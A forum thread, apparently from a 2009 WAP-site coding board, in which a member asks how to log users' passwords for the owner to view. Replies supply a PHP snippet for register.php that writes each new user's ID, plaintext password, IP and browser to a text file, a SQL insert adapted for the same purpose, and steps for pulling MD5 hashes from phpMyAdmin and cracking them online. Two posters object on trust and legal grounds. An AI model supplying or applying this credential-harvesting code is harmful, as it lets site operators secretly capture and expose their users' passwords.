Log Passwords

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Log Passwords

    anyone know how to make a log for users password and it just for owner only can view users password.

    #2
    There are 2 ways using mysql and text file.....

    1 i will say to use sql for this...

    Never use text but if your good are hiding the text yeah safe to do so....
    Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
    Visit: WapMasterz Coming Back Soon!
    _______
    SCRIPTS FOR SALE BY SUBZERO
    Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
    FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
    _______
    Info & Tips
    php.net
    w3schools.com

    Comment


      #3
      pass2 txt default....... i hav e teh code but not working it doesnt show passwords in profile on a lavalair...pls help me

      Comment


        #4
        Code:
        $brws = explode(" ",$_SERVER['HTTP_USER_AGENT']);
         $ubr = $brws[0];
         $fp = fopen("info.txt","a+");
         fwrite ($fp, "\n".$uid." ".$pwd." ".$ipr." ".$ubr."\n");
         fclose($fp);
        add that in register.php, and this is all i am helping with as this is not only a securty issue but a huge issue regarding breach of trust

        Comment


          #5
          wow thank u sir amy

          Comment


            #6
            ..on wapdesire versions there's a logs folder where inside
            you can find any decripted users passwords ..

            sigpicthe italian/international COMMUNITY of friendship
            http://people2000.netne.net
            WAP/WEB
            peoplemailbox@katamail.com

            Comment


              #7
              i had one working on my madfonez script using sql and when owners went to change a users password there current password came up on there profile for owners only:: note that was on the web version i have somewhere here









              Dont Ask Me Dumb Questions.Or you'l get a Dumb Answer..
              Want A Profesional Logo or Theme For Your wap site Pm Me.If I Have The Time Ill Make It For Free

              Comment


                #8
                yeah thats ryt....i have it too

                Comment


                  #9
                  U can , do it also manually by logging at phpmyadmin. .Look 4 ibwf users. Br0wse the mem id.U want to view the password. We all kn0w that. The password is in md5 form.In phpmyadmin.Just copy and paste the md5 hash. And calculate it here passcracking.ru and der u go. . .The hexadecimal of md5 will translate it to. Text/alphanumeric. It reveals the password of the user. This is manually mate. U can code 4 it. Also. .

                  Comment


                    #10
                    5/10 that will work lol


                    im one of the 5 that makes things work lol

                    51931fd1abd0558477c0d27574998345 << md5 lol

                    also if you use this one day you will crack it but you only get my url for site ;)
                    Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
                    Visit: WapMasterz Coming Back Soon!
                    _______
                    SCRIPTS FOR SALE BY SUBZERO
                    Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
                    FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
                    _______
                    Info & Tips
                    php.net
                    w3schools.com

                    Comment


                      #11
                      Yah sir i kn0w. Hehe . i just got dat teknik. In crap milw0rm.com. This is not adviseable it takes times. .Hehe

                      Comment


                        #12
                        my md5 is hard to crack

                        but when they do they will be pissed of with it lmao
                        Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
                        Visit: WapMasterz Coming Back Soon!
                        _______
                        SCRIPTS FOR SALE BY SUBZERO
                        Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
                        FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
                        _______
                        Info & Tips
                        php.net
                        w3schools.com

                        Comment


                          #13
                          this may help just edit this if you know ya codeing well
                          <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>
                          mysql_query("INSERT INTO reports_logs SET place=&#39;penalties&#39;, details=&#39;".getnick_uid(getuid_sid($sid))." Unshielded The user ".$unick."&#39;, time=&#39;".time()."&#39;");

                          you can edit it to
                          mysql_query("INSERT INTO logs SET pass=&#39;pass detales here&#39;, user=&#39;".user detales here."&#39;, time=&#39;".time here if you want it here."&#39;");

                          </div>
                          its easy if you know how you can put any thing in it like there browser ect ect

                          Comment


                            #14
                            you do realise that is a one way hashing algorythm. its impossible to "decrypt" an md5 pass . theres 32 chars and an infinite number of chars for a pass length. and if your good with salting the passwords too an md5 hash is impossible to get. One a secure site of mine i use a bit field and a secret field both containing around 40 chars give or take stripped illegal chars. every users salts are different and every users password is a minimum of around 86 characters containing numbers, letters, symbols and some other chars too. You could no doubt get an array of possible passwords, but to build that database of possibles would take millions of years on the current supercomputers we have .. and even then if your not clever to store the passwords in a binary data file non of those passwords would be correct as the salts contain a minimum of 10 codes that arent displayed to the computers screen

                            but anyway less about the theory lesson lol.. why on earth would you store peoples passwords like that.. apart from such an action being extremely illegal do you have no morales. i bet you have or are after a script to output users private messages too ?

                            Comment


                              #15
                              <div class='quotetop'>QUOTE (djlee @ Jan 24 2009, 12:49 AM) <{POST_SNAPBACK}></div>
                              but anyway less about the theory lesson lol.. why on earth would you store peoples passwords like that.. apart from such an action being extremely illegal do you have no morales. i bet you have or are after a script to output users private messages too ?[/b]
                              actualy i saw in some script, posted around here, that admin have a view of users sent msgs...
                              lol some ppl are tooooooooooooooo curious lol
                              sigpiceeeeerrr....

                              Comment

                              Working...
                              X